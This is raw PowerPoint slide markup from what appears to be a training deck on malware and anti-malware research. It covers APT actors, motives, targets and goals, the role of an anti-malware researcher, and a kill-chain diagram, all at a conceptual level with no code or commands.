              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Characteristics of an APT:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Actors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Motives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Targets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Actors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Terrorists/activists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Governments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Organized crime groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Competitors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Malicious insiders/ex-employee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324845160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z="3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Malware Economy - APT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Motives:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Money</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disgruntlement or revenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ideology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Excitement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Targets:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Large corporations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Governments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense Contractors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anyone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270281042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z="3200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Malware Economy - APT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1200151"/>
            <a:ext cx="7620000" cy="3394472"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Goals:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Use stealth during intrusion to avoid detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Create backdoors to allow greater access, especially if other access points have been discovered and patched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> Initiating the primary mission:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Stealing sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Monitoring communications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Disrupting operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> Leaving undetected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339462338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anti-malware research</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Why does anti-malware (AM) exist?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What’s your role as an anti-malware researcher?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Etiquette, best practices, and safe computing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Understand and describe the threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Author countermeasures (stop-gap, mid-term, long-term)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Approach design and development from an anti-attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>perspective</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="497576364"/>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80975"/>
            <a:ext cx="7477275" cy="485775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Introducing the ‘APT-Kill-Chain’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EEB8B06D-99A5-468B-806E-293788FE9637}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802190" y="2602957"/>
            <a:ext cx="8026400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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9" name="Pentagon 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10330" y="2441976"/>
            <a:ext cx="691558" cy="321962"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate">
            <a:avLst>
              <a:gd name="adj" fmla="val 3421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Start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1817823" y="932017"/>
            <a:ext cx="1474018" cy="2274372"/>
            <a:chOff x="1817823" y="1742515"/>
            <a:chExt cx="1474018" cy="2274372"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2182185" y="3767588"/>
              <a:ext cx="745294" cy="249299"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="45720" rIns="0" bIns="18288" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Step 2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 11"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1817823" y="1742515"/>
              <a:ext cx="1474018" cy="2045260"/>
              <a:chOff x="1858971" y="1742515"/>
              <a:chExt cx="1474018" cy="2045260"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="13" name="Straight Connector 12"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="2595980" y="1993900"/>
                <a:ext cx="0" cy="1019176"/>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12341" y="1987550"/>
                <a:ext cx="1167279" cy="0"/>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58971" y="1742515"/>
                <a:ext cx="1474018" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Weaponization</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="16" name="Group 15"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2208630" y="3013075"/>
                <a:ext cx="774700" cy="774700"/>
                <a:chOff x="2206705" y="3013075"/>
                <a:chExt cx="774700" cy="774700"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="Oval 16"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2206705" y="3013075"/>
                  <a:ext cx="774700" cy="774700"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">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7888" y="3028907"/>
                  <a:ext cx="408971" cy="666471"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5347976" y="1349182"/>
            <a:ext cx="1025084" cy="1857207"/>
            <a:chOff x="5347976" y="2159680"/>
            <a:chExt cx="1025084" cy="1857207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5483200" y="3767588"/>
              <a:ext cx="754636" cy="249299"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="45720" rIns="0" bIns="18288" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Step 5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5347976" y="2159680"/>
              <a:ext cx="1025084" cy="1628095"/>
              <a:chOff x="5347976" y="2159680"/>
              <a:chExt cx="1025084" cy="1628095"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="22" name="Straight Connector 21"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="5857343" y="2419350"/>
                <a:ext cx="6350" cy="593725"/>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422368" y="2413000"/>
                <a:ext cx="876300" cy="0"/>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347976" y="2159680"/>
                <a:ext cx="1025084" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Installation</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="25" name="Group 24"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5473168" y="3013075"/>
                <a:ext cx="774700" cy="774700"/>
                <a:chOff x="5486800" y="3013075"/>
                <a:chExt cx="774700" cy="774700"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="26" name="Oval 25"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5486800" y="3013075"/>
                  <a:ext cx="774700" cy="774700"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">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a:rPr>
                    <a:t> </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0927" y="3154681"/>
                  <a:ext cx="462084" cy="477058"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="664239" y="1349182"/>
            <a:ext cx="1574940" cy="1857207"/>
            <a:chOff x="664239" y="2159680"/>
            <a:chExt cx="1574940" cy="1857207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="TextBox 28"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1094391" y="3767588"/>
              <a:ext cx="714637" cy="249299"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="45720" rIns="0" bIns="18288" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Step 1</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="664239" y="2159680"/>
              <a:ext cx="1574940" cy="1628095"/>
              <a:chOff x="664239" y="2159680"/>
              <a:chExt cx="1574940" cy="1628095"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="31" name="Straight Connector 30"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="1448534" y="2419350"/>
                <a:ext cx="6350" cy="593725"/>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77722" y="2413000"/>
                <a:ext cx="1347974" cy="0"/>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4239" y="2159680"/>
                <a:ext cx="1574940" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Reconnaissance</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="34" name="Group 33"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1064359" y="3013075"/>
                <a:ext cx="774700" cy="774700"/>
                <a:chOff x="1113340" y="3013075"/>
                <a:chExt cx="774700" cy="774700"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="35" name="Oval 34"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1113340" y="3013075"/>
                  <a:ext cx="774700" cy="774700"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">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latin typeface="Arial"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>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9122" y="3209311"/>
                  <a:ext cx="569386" cy="382228"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4109911" y="932017"/>
            <a:ext cx="1321358" cy="2274372"/>
            <a:chOff x="4109911" y="1742515"/>
            <a:chExt cx="1321358" cy="2274372"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="TextBox 37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4397943" y="3767588"/>
              <a:ext cx="745294" cy="249299"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
